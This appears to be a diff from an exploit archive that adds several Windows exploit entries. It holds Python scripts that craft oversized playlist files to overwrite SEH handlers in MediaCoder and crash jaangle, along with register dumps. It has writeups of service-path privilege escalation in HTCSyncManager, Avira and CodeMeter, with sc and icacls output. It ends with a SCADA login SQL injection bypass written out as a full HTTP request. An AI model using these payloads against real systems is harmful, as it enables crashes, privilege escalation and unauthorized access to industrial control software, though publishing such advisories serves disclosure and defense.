ECX 43434343
|
||||
EDX 00000000
|
||||
EBX 43434343
|
||||
ESP 0012E4A4
|
||||
EBP 0012E4F4
|
||||
ESI 0012E508
|
||||
EDI 00000000
|
||||
|
||||
#!/usr/bin/python
|
||||
buffer = ("http://" + "A" * 845)
|
||||
nseh = ("B" * 4)
|
||||
seh = ("C" * 4)
|
||||
junk = ("D" * 60)
|
||||
|
||||
f= open("exploit.m3u",'w')
|
||||
f.write(buffer + nseh + seh + junk)
|
||||
f.close()
|
25
platforms/windows/local/35531.py
Executable file
25
platforms/windows/local/35531.py
Executable file
|
@ -0,0 +1,25 @@
|
|||
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst)
|
||||
# Date: 11/29/2010
|
||||
# Author: Hadji Samir s-dz@hotmail.fr
|
||||
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
|
||||
# Version: 0.8.33 build 5680
|
||||
|
||||
EAX 0012E788
|
||||
ECX 43434343
|
||||
EDX 00000000
|
||||
EBX 43434343
|
||||
ESP 0012E724
|
||||
EBP 0012E774
|
||||
ESI 0012E788
|
||||
EDI 00000000
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
buffer = ("http://" + "A" * 845)
|
||||
nseh = ("B" * 4)
|
||||
seh = ("C" * 4)
|
||||
junk = ("D" * 60)
|
||||
|
||||
f= open("exploit.lst",'w')
|
||||
f.write(buffer + nseh + seh + junk)
|
||||
f.close()
|
47
platforms/windows/local/35532.py
Executable file
47
platforms/windows/local/35532.py
Executable file
|
@ -0,0 +1,47 @@
|
|||
# jaangle 0.98i.977 Denial of Service Vulnerability
|
||||
# Author: hadji samir , s-dz@hotmail.fr
|
||||
# Download : http://www.jaangle.com/downloading?block
|
||||
# Tested : Windows 7 (fr)
|
||||
# DATE : 2012-12-13
|
||||
#
|
||||
|
||||
###################################################################
|
||||
|
||||
|
||||
EAX 000000C0
|
||||
ECX 00000000
|
||||
EDX 00000000
|
||||
EBX 00000003
|
||||
ESP 01C5FE28
|
||||
EBP 01C5FF88
|
||||
ESI 00000002
|
||||
EDI 002B4A98
|
||||
EIP 776964F4 ntdll.KiFastSystemCallRet
|
||||
C 0 ES 0023 32bit 0(FFFFFFFF)
|
||||
P 1 CS 001B 32bit 0(FFFFFFFF)
|
||||
A 0 SS 0023 32bit 0(FFFFFFFF)
|
||||
Z 0 DS 0023 32bit 0(FFFFFFFF)
|
||||
S 0 FS 003B 32bit 7FFDC000(8000)
|
||||
T 0 GS 0000 NULL
|
||||
D 0
|
||||
O 0 LastErr ERROR_SUCCESS (00000000)
|
||||
EFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)
|
||||
ST0 empty g
|
||||
ST1 empty g
|
||||
ST2 empty g
|
||||
ST3 empty g
|
||||
ST4 empty g
|
||||
ST5 empty g
|
||||
ST6 empty g
|
||||
ST7 empty g
|
||||
3 2 1 0 E S P U O Z D I
|
||||
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
|
||||
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
buff = ("\x41" * 30000 )
|
||||
|
||||
f = open("exploit.m3u",'w')
|
||||
f.write( buff )
|
||||
f.close()
|
38
platforms/windows/local/35534.txt
Executable file
38
platforms/windows/local/35534.txt
Executable file
|
@ -0,0 +1,38 @@
|
|||
# Exploit Title: HTCSyncManager 3.1.33.0 (HSMServiceEntry.exe) Service Trusted Path Privilege Escalation
|
||||
# Date: 12/12/2014
|
||||
#Author: Hadji Samir s-dz@hotmail.fr
|
||||
#Product web page: http://www.htc.com/fr/software/htc-sync-manager/
|
||||
#Affected version: 3.1.33.0
|
||||
#Tested on: Windows 7 (FR)
|
||||
|
||||
|
||||
HTC Synchronisation manager for devices HTC
|
||||
|
||||
Vulnerability Details
|
||||
There are weak permissions for 'HTCSyncManager'default installation where everyone is allowed to change
|
||||
the HSMServiceEntry.exe with an executable of their choice. When the service restarts or the system reboots
|
||||
the attacker payload will execute on the system with SYSTEM privileges.
|
||||
|
||||
|
||||
C:\Users\samir>sc qc HTCMonitorService
|
||||
[SC] QueryServiceConfig réussite(s)
|
||||
|
||||
SERVICE_NAME: HTCMonitorService
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : HTCMonitorService
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
|
||||
C:\Users\samir>icacls "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
|
||||
C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe AUTORITE NT\Système:(I)(F)
|
||||
BUILTIN\Administrateurs:(I)(F)
|
||||
BUILTIN\Utilisateurs:(I)(RX)
|
||||
|
||||
1 fichiers correctement traités ; échec du traitement de 0 fichiers
|
37
platforms/windows/local/35537.txt
Executable file
37
platforms/windows/local/35537.txt
Executable file
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: Avira 14.0.7.342 (avguard.exe) Service Trusted Path Privilege Escalation
|
||||
# Date: 11/12/2014
|
||||
#Author: Hadji Samir s-dz@hotmail.fr
|
||||
#Product web page: http://www.avira.com/
|
||||
#Affected version: 14.0.7.342
|
||||
#Tested on: Windows 7 (FR)
|
||||
|
||||
|
||||
|
||||
|
||||
Avira free antivirus 14.0.7.342
|
||||
(avguard.exe)
|
||||
Avira free antivirus 14.0.7.342 contains a flaw in the 'avguard.exe' file that may reportedly allow gaining access to unauthorized privileges.
|
||||
The issue is due to an unquoted search path, which may allow a local attacker
|
||||
to inject arbitrary code in the root path.
|
||||
|
||||
|
||||
C:\Users\samir>sc qc AntiVirService
|
||||
[SC] QueryServiceConfig réussite(s)
|
||||
|
||||
SERVICE_NAME: AntiVirService
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : "C:\Program Files\Avira\AntiVir Desktop\avguard.exe"
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Avira Real-Time Protection
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
C:\Users\samir>icacls "C:\Program Files\Avira\AntiVir Desktop\avguard.exe"
|
||||
C:\Program Files\Avira\AntiVir Desktop\avguard.exe AUTORITE NT\Système:(I)(F)
|
||||
BUILTIN\Administrateurs:(I)(F)
|
||||
BUILTIN\Utilisateurs:(I)(RX)
|
||||
|
||||
1 fichiers correctement traités ; échec du traitement de 0 fichiers
|
41
platforms/windows/local/35542.txt
Executable file
41
platforms/windows/local/35542.txt
Executable file
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title:CodeMeter 4.50.906.503 Service Trusted Path Privilege Escalation
|
||||
# Date: 07/12/2014
|
||||
#Author: Hadji Samir s-dz@hotmail.fr
|
||||
#Product web page: http://www.wibu.com/fr/codemeter.html
|
||||
#Affected version: 4.50.906.503
|
||||
#Tested on: Windows 7 (FR)
|
||||
|
||||
'CodeMeter.exe '
|
||||
CodeMeter represents the basic technology of all protection and licensing solutions from Wibu-Systems.
|
||||
|
||||
CodeMeter contains a flaw in the 'CodeMeter.exe'
|
||||
file that may reportedly allow gaining access to unauthorized privileges.
|
||||
The issue is due to an unquoted search path, which may allow a local attacker
|
||||
to inject arbitrary code in the root path.
|
||||
|
||||
|
||||
C:\Users\samir>sc qc CodeMeter.exe
|
||||
[SC] QueryServiceConfig réussite(s)
|
||||
|
||||
SERVICE_NAME: CodeMeter.exe
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : CodeMeter Runtime Server
|
||||
DEPENDENCIES : Tcpip
|
||||
: Winmgmt
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
C:\Users\samir>icacls "C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe"
|
||||
C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe AUTORITE NT\Système:(I)(F)
|
||||
BUILTIN\Administrateurs:(I)(F)
|
||||
BUILTIN\Utilisateurs:(I)(RX)
|
||||
|
||||
1 fichiers correctement traités ; échec du traitement de 0 fichiers
|
63
platforms/windows/webapps/35529.txt
Executable file
63
platforms/windows/webapps/35529.txt
Executable file
|
@ -0,0 +1,63 @@
|
|||
?
|
||||
Soitec SmartEnergy 1.4 SCADA Login SQL Injection Authentication Bypass Exploit
|
||||
|
||||
|
||||
Vendor: Soitec
|
||||
Product web page: http://www.soitec.com
|
||||
Affected version: 1.4 and 1.3
|
||||
|
||||
Summary: Soitec power plants are a profitable and ecological investment
|
||||
at the same time. Using Concentrix technology, Soitec offers a reliable,
|
||||
proven, cost-effective and bankable solution for energy generation in the
|
||||
sunniest regions of the world. The application shows how Concentrix technology
|
||||
works on the major powerplants managed by Soitec around the world. You will
|
||||
be able to see for each powerplant instantaneous production, current weather
|
||||
condition, 3 day weather forecast, Powerplant webcam and Production data history.
|
||||
|
||||
Desc: Soitec SmartEnergy web application suffers from an authentication bypass
|
||||
vulnerability using SQL Injection attack in the login script. The script fails
|
||||
to sanitize the 'login' POST parameter allowing the attacker to bypass the security
|
||||
mechanism and view sensitive information that can be further used in a social
|
||||
engineering attack.
|
||||
|
||||
Tested on: nginx/1.6.2
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Vendor status:
|
||||
|
||||
[16.11.2014] Vulnerability discovered.
|
||||
[02.12.2014] Vendor contacted.
|
||||
[08.12.2014] Vendor responds asking more details.
|
||||
[08.12.2014] Sent details to the vendor.
|
||||
[09.12.2014] Vendor confirms the vulnerability.
|
||||
[12.12.2014] Vendor applies fix to version 1.4.
|
||||
[14.12.2014] Coordinated public security advisory released.
|
||||
|
||||
|
||||
Advisory ID: ZSL-2014-5216
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5216.php
|
||||
|
||||
|
||||
16.11.2014
|
||||
|
||||
---
|
||||
|
||||
|
||||
|
||||
POST /scada/login HTTP/1.1
|
||||
Host: smartenergy.soitec.com
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://smartenergy.soitec.com/scada/login
|
||||
Cookie: csrftoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY; _ga=GA1.2.658394151.1416124715; sessionid=ixi3w5s72yopc29t9ewrxwq15lzb7v1e
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 87
|
||||
|
||||
csrfmiddlewaretoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY&login=%27+or+1%3D1--&password=blah
|
Loading…
Add table
Reference in a new issue